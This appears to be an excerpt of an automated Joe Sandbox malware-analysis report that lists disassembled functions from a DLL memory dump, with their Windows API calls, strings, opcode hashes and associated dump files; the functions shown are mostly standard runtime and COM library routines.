Instruction Fuzzy Hash: A5B012707426006FEE3C9F12DB78F2936167FC2745F1048CD651A5A5818673E401C544

Uniqueness

Uniqueness Score: -1.00%

Function 6F8D84B0 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99947c1bd9cce1cca58fe8dbcf87b4d1ea976514652fc3ccd802cf779a82aa1c
Instruction ID: 7626fb57ab82337c49f94e3325a9689b57700404de1e7fb8159e1e3c8a80fef5
Opcode Fuzzy Hash: 99947c1bd9cce1cca58fe8dbcf87b4d1ea976514652fc3ccd802cf779a82aa1c
Instruction Fuzzy Hash: BD115E72908609EFCB04CF59D841799FBF4FB45724F10867EE81997B80E735A950CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6F8E6FB1 Relevance: 54.3, APIs: 36, Instructions: 344COMMONLIBRARYCODE

Download Yara Rule

APIs

operator+.LIBCMT ref: 6F8E6FCC

Part of subcall function 6F8E4147: DName::DName.LIBCMT ref: 6F8E415A
Part of subcall function 6F8E4147: DName::operator+.LIBCMT ref: 6F8E4161

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: NameName::Name::operator+operator+
String ID:
API String ID: 2937105810-0
Opcode ID: 698cf06833dbd788c97ab3c1ff43337c7188bdf51e0f83389f6381d5cff8c304
Instruction ID: 28b3556e26124c5989ba86d1e316d8043e5d3d0e9e3b21646388aa07161eabba
Opcode Fuzzy Hash: 698cf06833dbd788c97ab3c1ff43337c7188bdf51e0f83389f6381d5cff8c304
Instruction Fuzzy Hash: A2D11075900309AFDF05DFA8C891AEDBBF4AF16314F0049A6E515EF291DB34AE45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6F8DEC9D Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,6F8DA2D4,6F9095C0,00000008,6F8DA468,?,?,?,6F9095E0,0000000C,6F8DA523,?), ref: 6F8DECA5
__mtterm.LIBCMT ref: 6F8DECB1

Part of subcall function 6F8DE97C: DecodePointer.KERNEL32(00000014,6F8DA397,6F8DA37D,6F9095C0,00000008,6F8DA468,?,?,?,6F9095E0,0000000C,6F8DA523,?), ref: 6F8DE98D
Part of subcall function 6F8DE97C: TlsFree.KERNEL32(00000023,6F8DA397,6F8DA37D,6F9095C0,00000008,6F8DA468,?,?,?,6F9095E0,0000000C,6F8DA523,?), ref: 6F8DE9A7
Part of subcall function 6F8DE97C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,6F8DA397,6F8DA37D,6F9095C0,00000008,6F8DA468,?,?,?,6F9095E0,0000000C,6F8DA523,?), ref: 6F8E2325
Part of subcall function 6F8DE97C: DeleteCriticalSection.KERNEL32(00000023,?,?,6F8DA397,6F8DA37D,6F9095C0,00000008,6F8DA468,?,?,?,6F9095E0,0000000C,6F8DA523,?), ref: 6F8E234F

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 6F8DECC7
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 6F8DECD4
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 6F8DECE1
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 6F8DECEE
TlsAlloc.KERNEL32(?,?,6F8DA2D4,6F9095C0,00000008,6F8DA468,?,?,?,6F9095E0,0000000C,6F8DA523,?), ref: 6F8DED3E
TlsSetValue.KERNEL32(00000000,?,?,6F8DA2D4,6F9095C0,00000008,6F8DA468,?,?,?,6F9095E0,0000000C,6F8DA523,?), ref: 6F8DED59
__init_pointers.LIBCMT ref: 6F8DED63
EncodePointer.KERNEL32(?,?,6F8DA2D4,6F9095C0,00000008,6F8DA468,?,?,?,6F9095E0,0000000C,6F8DA523,?), ref: 6F8DED74
EncodePointer.KERNEL32(?,?,6F8DA2D4,6F9095C0,00000008,6F8DA468,?,?,?,6F9095E0,0000000C,6F8DA523,?), ref: 6F8DED81
EncodePointer.KERNEL32(?,?,6F8DA2D4,6F9095C0,00000008,6F8DA468,?,?,?,6F9095E0,0000000C,6F8DA523,?), ref: 6F8DED8E
EncodePointer.KERNEL32(?,?,6F8DA2D4,6F9095C0,00000008,6F8DA468,?,?,?,6F9095E0,0000000C,6F8DA523,?), ref: 6F8DED9B
DecodePointer.KERNEL32(Function_0006EB00,?,?,6F8DA2D4,6F9095C0,00000008,6F8DA468,?,?,?,6F9095E0,0000000C,6F8DA523,?), ref: 6F8DEDBC
__calloc_crt.LIBCMT ref: 6F8DEDD1
DecodePointer.KERNEL32(00000000,?,?,6F8DA2D4,6F9095C0,00000008,6F8DA468,?,?,?,6F9095E0,0000000C,6F8DA523,?), ref: 6F8DEDEB
GetCurrentThreadId.KERNEL32 ref: 6F8DEDFD

Strings

FlsAlloc, xrefs: 6F8DECC1
KERNEL32.DLL, xrefs: 6F8DECA0
FlsSetValue, xrefs: 6F8DECD6
FlsGetValue, xrefs: 6F8DECC9
FlsFree, xrefs: 6F8DECE3

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 1868149495-3819984048
Opcode ID: ddac8a7d15ff8630a9faf3e2b14cb03ebca673d87feb37cfdc42a564868ad1aa
Instruction ID: 036c2e26f984fdb11c0e1ccf8eed3b7528bf08b51957ffeefd5061e86176bc3b
Opcode Fuzzy Hash: ddac8a7d15ff8630a9faf3e2b14cb03ebca673d87feb37cfdc42a564868ad1aa
Instruction Fuzzy Hash: F5316531809B14AEEF14DF79DD06E997BA5BF8667471009B6F420D7290D770A062CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6F880EA0 Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 337COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6F880EF2
std::_Xinvalid_argument.LIBCPMT ref: 6F880F14
_memmove.LIBCMT ref: 6F880F70
_memmove.LIBCMT ref: 6F880F95
_memmove.LIBCMT ref: 6F880FA9
_memmove.LIBCMT ref: 6F880FDB
_memmove.LIBCMT ref: 6F881182
std::_Xinvalid_argument.LIBCPMT ref: 6F8811B6

Strings

string too long, xrefs: 6F880EED, 6F880F0F
invalid string position, xrefs: 6F8811B1

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: _memmove$Xinvalid_argumentstd::_
String ID: invalid string position$string too long
API String ID: 1771113911-4289949731
Opcode ID: 20c68f1787f67225f22b19bebf6bb0ada0c7721d052d528d04330ea285f19198
Instruction ID: 97b0255d123d0e30e866ad0da12e2fede47dbd15dca35203b783466932b69de1
Opcode Fuzzy Hash: 20c68f1787f67225f22b19bebf6bb0ada0c7721d052d528d04330ea285f19198
Instruction Fuzzy Hash: 10B16C71314548ABDB28CE1CDD90A5EB7A6EF857447148E99F8B2CF781CA34EC41CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6F8E7FC4 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 138COMMONLIBRARYCODE

Download Yara Rule

APIs

UnDecorator::getBasicDataType.LIBCMT ref: 6F8E7FFF
DName::operator=.LIBCMT ref: 6F8E8013
DName::operator+=.LIBCMT ref: 6F8E8021
UnDecorator::getPtrRefType.LIBCMT ref: 6F8E804D
UnDecorator::getDataIndirectType.LIBCMT ref: 6F8E80CA
UnDecorator::getBasicDataType.LIBCMT ref: 6F8E80D3
operator+.LIBCMT ref: 6F8E8166

Strings

volatile, xrefs: 6F8E800B, 6F8E8139
std::nullptr_t, xrefs: 6F8E8122

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: Decorator::getType$Data$Basic$IndirectName::operator+=Name::operator=operator+
String ID: std::nullptr_t$volatile
API String ID: 2203807771-3726895890
Opcode ID: 7b954b6a72a2a86ad47a887281479382ea6f84c12c00062f194bd6038344f024
Instruction ID: 712755635f46d99428e17e5d1093d8ff61c2477b58dd8b1b176d7433c70d93ae
Opcode Fuzzy Hash: 7b954b6a72a2a86ad47a887281479382ea6f84c12c00062f194bd6038344f024
Instruction Fuzzy Hash: 0241917180C609BFDF16CFA8C9419EDBB74FB03391F0049E6E9655E295D731AA42CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6F88F95E Relevance: 19.6, APIs: 9, Strings: 2, Instructions: 332COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6F88FA0F
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6F88FA22
SafeArrayGetElement.OLEAUT32 ref: 6F88FA5A

Part of subcall function 6F893A90: SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6F893B71
Part of subcall function 6F893A90: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6F893B83

Part of subcall function 6F8969C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6F896A08
Part of subcall function 6F8969C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6F896A15
Part of subcall function 6F8969C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6F896A41

SafeArrayDestroy.OLEAUT32(?), ref: 6F8923B3
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923C3
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923D6
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923E9
SafeArrayDestroy.OLEAUT32(?), ref: 6F8923FC
SafeArrayDestroy.OLEAUT32(?), ref: 6F89240F

Part of subcall function 6F88DFB0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6F88DFF6
Part of subcall function 6F88DFB0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6F88E003
Part of subcall function 6F88DFB0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6F88E02F

Strings

RS7m, xrefs: 6F88FC82
RS{m, xrefs: 6F88FC3E

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ArraySafe$Bound$Destroy$Element
String ID: RS7m$RS{m
API String ID: 959723449-144615663
Opcode ID: 30bb8a31218708ca4387caa872fe71afebc5519f3db4859511b2be2f2c3cb472
Instruction ID: 98a581c0fb22747efba016df86c948ecac0d6db8ef53986f9e8001311adeb47f
Opcode Fuzzy Hash: 30bb8a31218708ca4387caa872fe71afebc5519f3db4859511b2be2f2c3cb472
Instruction Fuzzy Hash: 53C15D70A00204AFDB14DF68CD80FADB7BAAF85308F1049D9E955EF296DB75E981CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6F893690 Relevance: 18.2, APIs: 12, Instructions: 215COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6F8936CD
VariantInit.OLEAUT32(?), ref: 6F8936DA
VariantInit.OLEAUT32(?), ref: 6F8936E0
VariantInit.OLEAUT32(?), ref: 6F8936E6
VariantInit.OLEAUT32 ref: 6F8937DD
VariantCopy.OLEAUT32(?,?), ref: 6F8937E4
VariantInit.OLEAUT32 ref: 6F893815
VariantCopy.OLEAUT32(?,?), ref: 6F89381C
VariantClear.OLEAUT32(?), ref: 6F8938A8
VariantClear.OLEAUT32(?), ref: 6F8938AE
VariantClear.OLEAUT32(?), ref: 6F8938B4
VariantClear.OLEAUT32(?), ref: 6F8938BA

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: Variant$Init$Clear$Copy
String ID:
API String ID: 3833040332-0
Opcode ID: 29ffb955fa27ffd1608351022aa4ae77b4f175e8133848f0b7ee7e40b464f69a
Instruction ID: 80f73849105beec89d32a8577c0049615a9db2cdb86033e3f9a97322c1051315
Opcode Fuzzy Hash: 29ffb955fa27ffd1608351022aa4ae77b4f175e8133848f0b7ee7e40b464f69a
Instruction Fuzzy Hash: 86816E71901219AFDB04DFA8C984FEEBBB9FF49304F14459DE509AB381DB35A905CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6F89D880 Relevance: 18.2, APIs: 12, Instructions: 202COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6F89D8EC
VariantInit.OLEAUT32 ref: 6F89D902
VariantInit.OLEAUT32(?), ref: 6F89D90D
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6F89D929
SafeArrayPutElement.OLEAUT32(?,?,?), ref: 6F89D966
VariantClear.OLEAUT32(?), ref: 6F89D973
SafeArrayPutElement.OLEAUT32(?,?,?), ref: 6F89D9B4
VariantClear.OLEAUT32(?), ref: 6F89D9C1
SafeArrayDestroy.OLEAUT32(?), ref: 6F89DA6F
VariantClear.OLEAUT32(?), ref: 6F89DA80
VariantClear.OLEAUT32(?), ref: 6F89DA87
VariantClear.OLEAUT32(?), ref: 6F89DA99

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: Variant$Clear$ArraySafe$Init$Element$CreateDestroyVector
String ID:
API String ID: 1625659656-0
Opcode ID: e48794e3720cddebe83f34513f7d9532be6b2413e8e3f76de5a1db523a6decd1
Instruction ID: e9c688ae458d702d3efc2e18bf45019cfb5ffb8ad3868d807653739214783f55
Opcode Fuzzy Hash: e48794e3720cddebe83f34513f7d9532be6b2413e8e3f76de5a1db523a6decd1
Instruction Fuzzy Hash: 218125726087019FC704CF68C884B5AB7E5BFC9724F048A9EF9949B250E774E946CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6F8812A0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 171COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6F8812DD
std::_Xinvalid_argument.LIBCPMT ref: 6F8812FB
_memmove.LIBCMT ref: 6F881368
_memmove.LIBCMT ref: 6F88139F
std::_Xinvalid_argument.LIBCPMT ref: 6F88140C

Strings

string too long, xrefs: 6F8812D8, 6F8812F6
invalid string position, xrefs: 6F881407

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: invalid string position$string too long
API String ID: 2168136238-4289949731
Opcode ID: 921597260dc3263af312aa4a50e966ba99f0d55d51b824bb277ddbe1df52c820
Instruction ID: 0018f5b5632b7d26800d94b58b8a940fe5a4de346580af9eca1826b929c68789
Opcode Fuzzy Hash: 921597260dc3263af312aa4a50e966ba99f0d55d51b824bb277ddbe1df52c820
Instruction Fuzzy Hash: C44183313006049BD724CE6CE990A9EB3A6EF857547240EAEE4B1CFA85DB74E845C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 6F89CD20 Relevance: 15.5, APIs: 10, Instructions: 485COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6F89CD5C
VariantInit.OLEAUT32(?), ref: 6F89CD65
VariantInit.OLEAUT32(?), ref: 6F89CD6B
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6F89CD76
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6F89CDAA
VariantClear.OLEAUT32(?), ref: 6F89CDB7
SafeArrayDestroy.OLEAUT32(00000000), ref: 6F89D2A5
VariantClear.OLEAUT32(?), ref: 6F89D2B5
VariantClear.OLEAUT32(?), ref: 6F89D2BB
VariantClear.OLEAUT32(?), ref: 6F89D2C1

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: Variant$Clear$ArrayInitSafe$CreateDestroyElementVector
String ID:
API String ID: 2515392200-0
Opcode ID: 59525c3d5fc7fc89a569d3eef56cb91fcc035c2e65d1ea87462a4084e422dad4
Instruction ID: 1038ab643ae10ac8bcc1228b27fff5c7f8d0cd799ab82b185ed0ddb8c1e4db55
Opcode Fuzzy Hash: 59525c3d5fc7fc89a569d3eef56cb91fcc035c2e65d1ea87462a4084e422dad4
Instruction Fuzzy Hash: CA12D675A15705AFC758DB98DD84DAAB3B9BF8D300F144A6CF50AABB91CA30F841CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6F894BA0 Relevance: 15.5, APIs: 10, Instructions: 475COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6F894BDC
VariantInit.OLEAUT32(?), ref: 6F894BE5
VariantInit.OLEAUT32(?), ref: 6F894BEB
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6F894BF6
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6F894C2A
VariantClear.OLEAUT32(?), ref: 6F894C37
SafeArrayDestroy.OLEAUT32(00000000), ref: 6F895107
VariantClear.OLEAUT32(?), ref: 6F895117
VariantClear.OLEAUT32(?), ref: 6F89511D
VariantClear.OLEAUT32(?), ref: 6F895123

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: Variant$Clear$ArrayInitSafe$CreateDestroyElementVector
String ID:
API String ID: 2515392200-0
Opcode ID: d3efaf75f4be8d52f51885442d85b9541dfb766b874e27ca5e472170d49946a0
Instruction ID: 982a72a7d4eac9c768f489675cd127a710cff36c9825b15fdb9f17f1f7c3e7f5
Opcode Fuzzy Hash: d3efaf75f4be8d52f51885442d85b9541dfb766b874e27ca5e472170d49946a0
Instruction Fuzzy Hash: C712E775A15705AFC758DB98DD84DAAB3B9BF8D300F14466CF50A9BB91CA30F841CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6F8949B0 Relevance: 15.2, APIs: 10, Instructions: 174COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(6F8F05A8), ref: 6F8949EE
VariantInit.OLEAUT32(?), ref: 6F8949F7
VariantInit.OLEAUT32(?), ref: 6F8949FD
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6F894A08
